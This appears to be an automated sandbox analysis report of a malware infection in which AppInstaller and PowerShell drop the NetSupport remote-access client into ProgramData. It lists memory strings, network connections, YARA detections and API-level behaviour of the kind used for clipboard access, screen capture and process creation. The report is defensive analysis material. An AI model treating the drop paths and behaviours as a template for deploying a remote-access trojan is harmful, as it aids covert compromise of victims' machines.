                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.drString found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.drString found in binary or memory: http://sf.symcd.com0&
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.drString found in binary or memory: http://sv.symcd.com0&
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                    Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000002.1776317770.00000196D6200000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11E621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                                    Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                                    Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                                    Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,32_2_1101F350
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_11032870 GetClipboardFormatNameA,SetClipboardData,32_2_11032870
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,32_2_11031B70
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,32_2_110076F0
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,32_2_11110930
                                    Source: Yara match File source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match File source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                    Source: Yara match File source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
                                    Source: Yara match File source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.u5y27yz6k3vi25fmvsudde2mb.tmp

                                    Spam, unwanted Advertisements and Ransom Demands

                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,32_2_11112960

                                    System Summary

                                    Source: amsi64_7788.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                    Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                    Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\PCICHEK.DLL
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\msvcr100.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\AudioCapture.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\TCCTL32.DLL
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\remcmdstub.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\client32.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\pcicapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\PCICL32.DLL
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\netsupport\client\HTCTL32.DLL
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_110A9020: DeviceIoControl,32_2_110A9020
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1115A250 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,32_2_1115A250
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102D1B3
                                    Source: C:\ProgramData\netsupport\client\client32.exe Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102CE84
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B6F3D23_2_00007FF9BB3B6F3D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CDF1023_2_00007FF9BB3CDF10
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CC7AD23_2_00007FF9BB3CC7AD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C6FAB23_2_00007FF9BB3C6FAB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C5FAD23_2_00007FF9BB3C5FAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C277623_2_00007FF9BB3C2776
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B3F6D23_2_00007FF9BB3B3F6D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA77D23_2_00007FF9BB3CA77D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CB61D23_2_00007FF9BB3CB61D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B763D23_2_00007FF9BB3B763D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA5DD23_2_00007FF9BB3CA5DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B2DFD23_2_00007FF9BB3B2DFD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C660B23_2_00007FF9BB3C660B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA52D23_2_00007FF9BB3CA52D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C6D2D23_2_00007FF9BB3C6D2D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CBD4823_2_00007FF9BB3CBD48
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3BCD3D23_2_00007FF9BB3BCD3D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C559D23_2_00007FF9BB3C559D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B956D23_2_00007FF9BB3B956D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CC58D23_2_00007FF9BB3CC58D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CCD9023_2_00007FF9BB3CCD90
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB546FA523_2_00007FF9BB546FA5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB5314F023_2_00007FF9BB5314F0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB69EC7523_2_00007FF9BB69EC75
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB69B33623_2_00007FF9BB69B336
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB691B2823_2_00007FF9BB691B28
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A13B023_2_00007FF9BB6A13B0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A12AF23_2_00007FF9BB6A12AF
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB6A11B623_2_00007FF9BB6A11B6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF5135825_2_00007FF9BAF51358
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF663E925_2_00007FF9BAF663E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF66B1025_2_00007FF9BAF66B10
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF6728825_2_00007FF9BAF67288
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BAF5B1D525_2_00007FF9BAF5B1D5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C9D3825_2_00007FF9BB1C9D38
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB1C86E125_2_00007FF9BB1C86E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB22176025_2_00007FF9BB221760
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB25313625_2_00007FF9BB253136
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB400C1D25_2_00007FF9BB400C1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FAC4025_2_00007FF9BB3FAC40
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40AC3E25_2_00007FF9BB40AC3E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4133E925_2_00007FF9BB4133E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB407BDD25_2_00007FF9BB407BDD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406C9D25_2_00007FF9BB406C9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BCB825_2_00007FF9BB40BCB8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4104C025_2_00007FF9BB4104C0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FB31D25_2_00007FF9BB3FB31D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40CB4D25_2_00007FF9BB40CB4D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40631425_2_00007FF9BB406314
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB404B0B25_2_00007FF9BB404B0B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40CBAB25_2_00007FF9BB40CBAB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FE35D25_2_00007FF9BB3FE35D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A24C25_2_00007FF9BB40A24C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40723B25_2_00007FF9BB40723B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FD24D25_2_00007FF9BB3FD24D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4091FD25_2_00007FF9BB4091FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40C2AD25_2_00007FF9BB40C2AD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB405A9D25_2_00007FF9BB405A9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BAD525_2_00007FF9BB40BAD5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FFA5D25_2_00007FF9BB3FFA5D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406A7D25_2_00007FF9BB406A7D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BA7D25_2_00007FF9BB40BA7D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A92D25_2_00007FF9BB40A92D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40514B25_2_00007FF9BB40514B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4098DD25_2_00007FF9BB4098DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F119925_2_00007FF9BB3F1199
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4001BD25_2_00007FF9BB4001BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40B16D25_2_00007FF9BB40B16D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40798425_2_00007FF9BB407984
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40484D25_2_00007FF9BB40484D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40B7DD25_2_00007FF9BB40B7DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F07FD25_2_00007FF9BB3F07FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406FFE25_2_00007FF9BB406FFE
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FF00D25_2_00007FF9BB3FF00D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F000A25_2_00007FF9BB3F000A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4058BD25_2_00007FF9BB4058BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB4080BD25_2_00007FF9BB4080BD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F186D25_2_00007FF9BB3F186D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40786B25_2_00007FF9BB40786B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB405F1D25_2_00007FF9BB405F1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB406F1B25_2_00007FF9BB406F1B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40C71D25_2_00007FF9BB40C71D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40A79D25_2_00007FF9BB40A79D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3F47C225_2_00007FF9BB3F47C2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB409F6D25_2_00007FF9BB409F6D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40BF8D25_2_00007FF9BB40BF8D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB40161D25_2_00007FF9BB40161D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF9BB3FD5DD25_2_00007FF9BB3FD5DD
